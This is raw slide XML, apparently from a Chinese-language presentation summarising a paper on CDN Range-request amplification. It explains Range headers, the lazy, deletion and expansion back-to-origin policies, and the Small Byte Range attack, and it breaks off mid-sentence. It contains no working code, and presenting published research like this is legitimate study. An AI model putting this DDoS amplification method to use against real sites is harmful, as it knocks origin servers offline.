                                      </p:cBhvr>
                                      <p:by x="91000" y="91000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="110000" y="110000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="400"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="91000" y="91000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="110000" y="110000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="400"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="91000" y="91000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="24" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="650"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="110000" y="110000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="6" presetClass="emph" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="400"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="91000" y="9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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71946" y="1402259"/>
            <a:ext cx="4622419" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>缓存：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求时，需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求头中加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>头，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>头的形式有两种：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单一范围：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Range: bytes=0-1023</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>带上述请求头的请求返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0-1023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字节，服务器端会返回状态码为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>206 Partial Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的响应，响应内容为我们所请求的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字节的内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>多重范围，用于请求多个数据块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范围可重叠，后面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ORB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>手法就是利用重叠的范围进行攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Range: bytes=0-50, 100-150</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>带有多重范围</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求的请求，服务器会返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>206 Partial Content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>状态码，同时使用类似文件上传时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>multipart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>多重分块作为响应（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>multipart/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>byteranges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下面使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>boundary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行分割多块内容。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B8373C8-5E1A-4221-922E-50FEA265A523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824946" y="499228"/>
            <a:ext cx="6014125" cy="3388819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="image.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ED2FE94-ECCC-43F7-9F75-4323D64455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2670" y="4079915"/>
            <a:ext cx="6035784" cy="3548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03785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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71946" y="1402259"/>
            <a:ext cx="4622419" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>论文中整理了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求时的回源策略有如下三种（详见原论文中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Table I/Table II</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>懒惰型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不做任何改变，直接转发带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头的请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>删除型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头再转发</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>扩展型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头扩展到一个比较大范围</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其中删除型及扩展型是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存为了增加缓存命中率而做的优化，对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求的资源（文件）尽量的多请求，以便客户端向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求后续分块时无需再向源站请求数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方式以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数量、前后顺序提出了两种攻击方式：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E54205CE-2BB3-4B4C-8348-CD903D5F57F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5890891" y="2624603"/>
            <a:ext cx="5181600" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242521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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71945" y="1019782"/>
            <a:ext cx="11050249" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Small Byte Range(SBR)Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（小字节范围攻击）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>该方法的主旨是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>放大攻击打目标源站，无需一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类反射放大攻击需要源地址伪造。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简单来说就是使用了删除型、扩展型回源策略的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，向源站请求尽量大的内容，且响应给客户端的内容依然为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头预期的小内容。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>放大倍数约等于所访问的文件大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>响应包大小，论文中统计了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test.jpg</a:t>
            </a:r>
            <a:r>
